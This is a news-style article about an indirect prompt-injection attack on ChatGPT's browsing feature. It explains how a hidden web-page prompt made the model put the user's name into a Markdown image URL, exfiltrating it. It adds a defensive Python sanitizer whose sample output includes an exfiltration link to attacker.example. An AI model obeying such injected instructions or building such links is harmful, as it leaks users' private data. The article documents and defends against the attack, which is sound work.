OpenAI temporarily disabled its new browsing feature for ChatGPT Plus subscribers following the public demonstration of significant security vulnerabilities. The feature, named “Browse with Bing,” allowed the large language model (LLM) to access the live internet to provide users with up-to-date information. However, security researchers quickly uncovered methods to exploit this capability through prompt injection attacks.
The core issue revolves around the AI’s interaction with external web content. When a user asks ChatGPT to summarize a webpage, the browsing feature visits the page and processes its content. Researchers demonstrated that malicious instructions hidden within a webpage’s code could hijack the chatbot’s operations, causing it to perform actions unintended by the user.
Proof-of-Concept Attack Exfiltrates User Data
Security researcher Johann Rehberger published a proof-of-concept demonstrating how to exploit the browsing feature. Rehberger created a webpage containing a hidden prompt. When ChatGPT’s browser was directed to this page for a summary, it executed the hidden instructions. The malicious prompt instructed the chatbot to retrieve personally identifiable information (PII) from the user’s previous conversation history.
In his demonstration, the hidden prompt specifically commanded the chatbot to reveal the user’s name. It then instructed the AI to embed this captured information into a URL using a Markdown image tag. Because the chat interface rendered that image, the user’s client fetched the URL, and the embedded data arrived at an external server controlled by the researcher; this is data exfiltration, with the image request acting as the covert channel. The attack is classified as an indirect prompt injection because the malicious instructions are not supplied by the user directly but are ingested from an untrusted external data source the model was asked to process.
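One defender-side control against the exfiltration channel described above is to refuse to render Markdown images whose URL points outside an allowlist of known image hosts, and to log what was stripped so that injection attempts become visible. The Python below is an added illustration written for this article; it is not OpenAI’s code and not part of the original report. The allowlist, the sample model response and the host names attacker.example and cdn.example-chat.test are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Hypothetical allowlist: the only hosts the chat UI may load images from.
# In a real deployment this would be the service's own CDN.
ALLOWED_IMAGE_HOSTS = {"cdn.example-chat.test"}

# Matches Markdown image syntax: ![alt](url) or ![alt](url "title").
MARKDOWN_IMAGE = re.compile(r'!\[([^\]]*)\]\((\S+?)(?:\s+"[^"]*")?\)')

# Constructed model output: a benign image plus an injected tracking image
# that smuggles the user's name out in a query parameter, as in the
# proof-of-concept described in the article.
SAMPLE_RESPONSE = (
    "Here is a summary of the page you asked about.\n\n"
    "![chart](https://cdn.example-chat.test/chart.png)\n\n"
    "![status](https://attacker.example/pixel.png?u=Alice)\n"
)


def classify_image_url(url):
    """Return 'allowed' or a reason the image must not be rendered."""
    parsed = urlparse(url)
    # data:, javascript:, relative and other non-http(s) schemes are refused
    # outright; only plain web URLs are even considered.
    if parsed.scheme not in ("http", "https"):
        return "blocked-scheme"
    host = (parsed.hostname or "").lower()
    if host not in ALLOWED_IMAGE_HOSTS:
        return "blocked-host"
    return "allowed"


def sanitize_markdown(text):
    """Strip untrusted image links from model output before rendering.

    Returns (sanitized_text, findings). Each finding records the removed
    URL, why it was removed and the query parameter names it carried,
    which is what an operator would want in a detection log.
    """
    findings = []

    def replace(match):
        alt, url = match.group(1), match.group(2)
        verdict = classify_image_url(url)
        if verdict == "allowed":
            return match.group(0)
        findings.append({
            "url": url,
            "reason": verdict,
            "params": sorted(parse_qs(urlparse(url).query)),
        })
        # Keep a visible placeholder so the user sees something was removed.
        return f"[image removed: {alt or 'untrusted source'}]"

    return MARKDOWN_IMAGE.sub(replace, text), findings


if __name__ == "__main__":
    clean, found = sanitize_markdown(SAMPLE_RESPONSE)
    print(clean)
    for finding in found:
        print("stripped:", finding)
```

The allowlist is the essential part: a denylist of known bad hosts cannot keep up, whereas refusing every host except your own CDN closes the channel regardless of which domain the injected prompt names. Any query parameters on a blocked URL are worth logging, since a benign image rarely carries user-derived values. Inline HTML `<img>` tags, if the renderer accepts them, need the same treatment.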
The Challenge of Securing Internet-Connected LLMs
The successful demonstrations by Rehberger and other researchers, such as Kai Greshake, highlighted the security challenges inherent in connecting LLMs to the internet. The attacks work because the model is designed to follow instructions and could not reliably distinguish the user’s legitimate request from commands hidden within the browsed web content: to the model, both arrive as text in the same context window.
In response to these public disclosures, OpenAI took action by disabling the “Browse with Bing” feature. The company stated it was taking the feature offline to address the issue of the model sometimes displaying content in ways that were not intended by the original website owners. The incidents serve as a real-world example of the security problems facing developers as they integrate AI with external, uncontrolled data sources.